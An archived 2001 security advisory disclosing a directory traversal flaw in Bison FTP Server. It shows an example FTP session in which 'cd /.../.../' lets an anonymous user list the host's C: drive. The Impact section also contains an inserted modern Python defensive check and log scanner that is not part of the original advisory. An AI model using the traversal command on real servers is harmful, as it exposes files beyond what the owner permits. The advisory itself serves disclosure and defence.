Hexyn / Securax Advisory #17 - Bison FTP Server Directory Traversal

2001-05-14T00:00:00
ID SECURITYVULNS:DOC:1608
Type securityvulns
Reporter Securityvulns
Modified 2001-05-14T00:00:00

Description

Hexyn / Securax Advisory #17 - Bison FTP Server Directory Traversal

Topic: Bison FTP Server Directory Traversal
Announced: 2001-02-17
Affects: Bison FTP Server version 4 Release 1

DISCLAIMER:


THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS. THEREFORE WE CANNOT ASSURE YOU THAT THE INFORMATION BELOW IS 100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.

THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS BE CORRECT.

I. Problem Description


Bison FTP Server is an FTP server for Windows 9x/NT. A bug allows any user, including an anonymous login, to change to any directory on the host, outside the FTP root.

II. Impact


When the client sends the command "CWD ..." (or "cd ..." in the default UNIX FTP client), the server moves one directory up without checking that the result stays inside the FTP root, so repeated "..." components walk all the way to the root of the drive.

Example:

<snip>
230 User anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /.../.../
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /.
<directory listing of c:\>
ftp> quit
221 Bye.
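The check an FTP server needs in order not to behave like the session above, as an added example written for this advisory rather than code from Bison FTP Server: the CWD argument is resolved as a virtual path confined to the FTP root, ".." can never climb above the root, and any other dot-only component (such as the "..." the session uses) is refused instead of being handed to the OS. Function names, the 250/550 reply codes used as return values and the sample log lines are assumptions for the example.

```python
import re

DOT_ONLY = re.compile(r"^\.+$")  # ".", "..", "...", "....", ...


class TraversalRejected(ValueError):
    """Raised when a CWD argument could leave the virtual root."""


def resolve_cwd(current: str, requested: str) -> str:
    """Return the new virtual working directory, always rooted at '/'.

    `current` is the client's present virtual directory, `requested` the
    raw CWD argument. Raises TraversalRejected for anything that is not a
    plain name, '.', or '..'; '..' at the root is simply a no-op."""
    requested = requested.replace("\\", "/")      # Windows hosts accept both
    if ":" in requested or requested.startswith("//"):
        raise TraversalRejected(requested)        # drive letter / UNC prefix
    base = [] if requested.startswith("/") else [p for p in current.split("/") if p]
    for part in requested.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if base:                              # never pop past the root
                base.pop()
            continue
        if DOT_ONLY.match(part):
            # "..." and friends: exactly the component the advisory abuses.
            raise TraversalRejected(requested)
        base.append(part)
    return "/" + "/".join(base)


def ftp_reply(current: str, requested: str):
    """Model the server's answer: (250, new_dir) or (550, unchanged_dir)."""
    try:
        return 250, resolve_cwd(current, requested)
    except TraversalRejected:
        return 550, current


def suspicious_cwd_lines(log_lines):
    """Flag logged CWD commands whose argument the check above would reject."""
    hits = []
    for line in log_lines:
        m = re.search(r"\bCWD\s+(\S+)", line)
        if m and ftp_reply("/", m.group(1))[0] == 550:
            hits.append(line)
    return hits


SAMPLE_LOG = [  # constructed sample lines, not taken from the advisory
    "anonymous CWD pub",
    "anonymous CWD /.../.../",
    "anonymous CWD ../../..",
]
```

Running `suspicious_cwd_lines(SAMPLE_LOG)` over the constructed lines flags only the "/.../.../" request; the plain "../../.." request resolves harmlessly to the root.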

III. Solution


At the time of writing, no patch is available.

IV. Credits


Bug discovered by t-Omicr0n <omicr0n@themail.com>

Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone at #securax@irc.hexyn.be

-- t-Omicr0n @ http://t-Omicr0n.hexyn.be